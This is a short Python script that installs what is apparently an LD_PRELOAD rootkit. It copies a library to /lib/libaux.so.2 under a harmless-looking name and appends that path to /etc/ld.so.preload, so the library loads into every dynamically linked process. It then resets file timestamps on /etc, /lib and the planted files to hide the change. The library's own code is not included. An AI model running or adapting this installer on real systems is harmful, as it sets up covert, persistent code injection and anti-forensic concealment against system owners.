#!/usr/bin/python

import os
import stat
import sys

ldlib_filename = "ld_preload.so"
lib_dst = "/lib/libaux.so.2"
lib_time_file = "/lib"

preload_filename = "/etc/ld.so.preload"
preload_time_filename = "/etc/ld.so.conf.d"

time_dict = dict()

def save_time_to_dict(file):
    time_dict[file] = os.stat(file)

def save_time():
    save_time_to_dict("/etc")
    save_time_to_dict("/lib")
    save_time_to_dict("/etc/ld.so.conf.d")

def restor_time():
    for file in time_dict:
        os.utime(file, (time_dict[file][stat.ST_ATIME], time_dict[file][stat.ST_MTIME]))


def change_preload_config():
    file = open(preload_filename, "a")
    file.write("\n%s\n" % lib_dst)
    file.close()
    os.utime(preload_filename, (time_dict["/etc/ld.so.conf.d"][stat.ST_ATIME], time_dict["/etc/ld.so.conf.d"][stat.ST_MTIME]))

def copy_preload():
    os.system("cp %s %s" % (ldlib_filename, lib_dst))
    os.system("chmod 644 %s" % lib_dst)
    os.system("chown root: %s" % lib_dst)
    os.utime(lib_dst, (time_dict['/lib'][stat.ST_ATIME], time_dict['/lib'][stat.ST_MTIME]))

def install():
    save_time()
    copy_preload()
    change_preload_config()
    restor_time()

if __name__ == "__main__":
    if(len(sys.argv) == 2): lib_dst = sys.argv[1]
    install()
